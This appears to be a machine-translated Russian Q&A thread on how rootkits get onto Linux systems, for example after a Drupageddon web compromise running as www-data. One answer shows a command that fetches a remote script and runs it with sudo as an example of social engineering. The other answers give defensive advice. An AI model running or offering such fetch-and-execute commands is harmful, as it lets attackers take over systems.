Я видел несколько сообщений о проверке руткитов, но не смог найти никакой информации о том, как они попадают в систему Linux. В частности, если вы используете ошибку на веб-сайте php (да, я говорю о drupageddon здесь), возможно ли установить руткит, даже если вы можете работать только как веб-сервер (www-data), а не как root. Очень мало информации о том, как они установлены, говорит о том, что для их установки вам нужно быть пользователем root (см. Здесь ).
11
wget http://mydomain/script.sh;sudo ./script.sh
Ответы:
Если бы это был я, я бы использовал следующий метод:
Относительно # 1: пользователь никогда не должен загружать случайное программное обеспечение при использовании Linux; используйте соответствующие каналы (Ubuntu Software Center) для установки программного обеспечения. Если это программное обеспечение необходимо загружать за пределы соответствующих каналов, убедитесь, что источнику загрузки можно доверять. Вспомните последние версии программного обеспечения Apache или MySQL. Не стоит загружать случайное программное обеспечение, не проверяя различные социальные сети на предмет целостности этого приложения. Microsoft никогда не централизовала программное обеспечение; это привело к тому, что многие люди занимались программным обеспечением, поэтому их пользовательская база огромна, но это также позволило легко войти в компьютеры и начать собирать данные, которые они могут продать.
Относительно № 2: роковая ошибка пользователя. Никогда и никогда не вводите свой пароль администратора, если вы не знаете, почему его спрашивают.
источник
Да, в целом, для установки руткита требуются права root. Многие из руткитов содержат модуль, который загружается в ядро, другой инструмент просто перезаписи, обычно используемый root. В правильно настроенной и совершенной системе не было бы возможности установить рут-кит без привилегий root, но ...
... могут быть проблемы с конфигурацией системы, делающие систему небезопасной. ... могут быть ошибки безопасности, которые допускают повышение привилегий ... могут быть способы обмануть пользователя с правами root для запуска чего-то злого.
Пути так же безграничны, как воображение злоумышленника.
источник